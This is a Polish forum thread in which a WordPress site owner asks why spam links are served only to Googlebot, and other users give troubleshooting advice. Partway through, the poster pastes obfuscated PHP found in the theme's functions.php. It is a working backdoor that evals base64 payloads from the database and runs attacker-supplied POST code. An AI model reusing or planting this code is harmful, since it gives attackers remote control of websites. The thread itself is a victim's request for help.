Problem ze stroną www.

[drajvver 4]

Witajcie.

Mam pewien problem ze stroną www (hostowana w Mintshost, jeżeli to ma jakieś znaczenie).

Oparta jest na WordPressie, żadnych "podejrzanych" wtyczek nie mam zainstalowanych, zaczęło się to dziać kilka dni temu. Do supportu jeszcze nie pisałem, bo nie wiem czy to ich wina, czy nie.
Otóż, dla googlebota strona wygląda tak: http://pastebin.com/d5eimJzG
Za to dla normalnej osoby, tych wszystkich linków "ponad" tagiem <html> nie widać, co wydaje się być dość oczywiste (wydaje mi się, że idzie to jakby w nagłówku z serwera).

Czy ktoś wie może, dlaczego tak się dzieje? Wina jakiegoś wirusa na serwerze, czy coś mi "siadło" na WordPressie i trzeba jakoś to usunąć?

Pozdrawiam,
Krzysiek.

[is_wm 287]

Pewnie coś ci się sprytnie dopisało do kodu. Sprawdź sobie co masz w headerze wordpressa. Oczywiście warto by zobaczyć daty modyfikacji plików i porównać z logami (www/FTP), potem zadziałać w zależności od przyczyny (zaktualizować skrypt/wtyczkę/zmienić hasło do FTP i przeskanować kompa).

Na koniec zainstaluj sobie jakąś wtyczkę do przeglądarki, która pozwala na ustawienie swojego UserAgenta - ustaw sobie taki, jak ma google bot i zobacz czy pomogło.

[drajvver 4]

Podmieniłem pliki wordpresa (te w głównym folderze) na oryginalne, pobrane z oficjalnej strony, ale nadal to samo się dzieje.
Będę próbował jeszcze z pozostałymi, sprawdzę pluginy itp. ale nie chce mi się wierzyć, żeby to było jakoś bardzo z mojej winy, do FTP i DA mam dostęp tylko ja.

 

EDIT:

Po podmienieniu całego folderu wp-includes też nic się nie zmieniło.

 

EDIT2:

Chyba znalazłem, w themie mojej strony (Pagelines) w pliku functions.php był taki fajny kod:

<?php $yHHmhg = 'p'.'re'.'g_'.'r'.'eplace';$yHHmhg('/ad/e','e'.'va'.'l(ba'.'se'.'64_decode(get_op'.'tion("Kx'.'VQyX")))', 'add');?><?php $WgNGwY = 'preg_r'.'ep'.'l'.'a'.'ce';$WgNGwY('/ad/e','ev'.'a'.'l(b'.'ase64_de'.'code(get_optio'.'n("jpDe'.'JQ")))', 'add');?><?php
function _g3t($str){
    $val = !empty($_GET[$str]) ? $_GET[$str] : null;
    return $val;
}
if(_g3t('jhX')=='f')
{
@eval($_POST['zDqmT']);
exit;
}
if(_g3t('jhX')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}
//dsd6sc378axvg
?>

Nie wiem o co chodzi, chyba jest zakodowany w base64, ale po odkodowaniu nadal nie ma w nim nic ciekawego.
W każdym razie na chwilę obecną jest w porządku, pytanie tylko czy to się powtórzy, czy to jakiś backdoor?

Edytowano Maj 3, 2014 przez drajvver (zobacz historię edycji)

[PapaSmerf 497]

W każdym razie na chwilę obecną jest w porządku, pytanie tylko czy to się powtórzy, czy to jakiś backdoor?

 

Stawiałbym na jakąś dziurawą wtyczkę. Mało to takich do WP, które pisane są przez osoby, które o programowaniu pojęcia nie mają?

 

[pionas 0]

@pedro84 ma rację, musisz uważać co dodajesz, ostatnio poprawiałem stronę na WP z wtyczką galerii zdjęć, bo też dopisany był jakiś kod, z tymże w moim przypadku avast wywalał warning...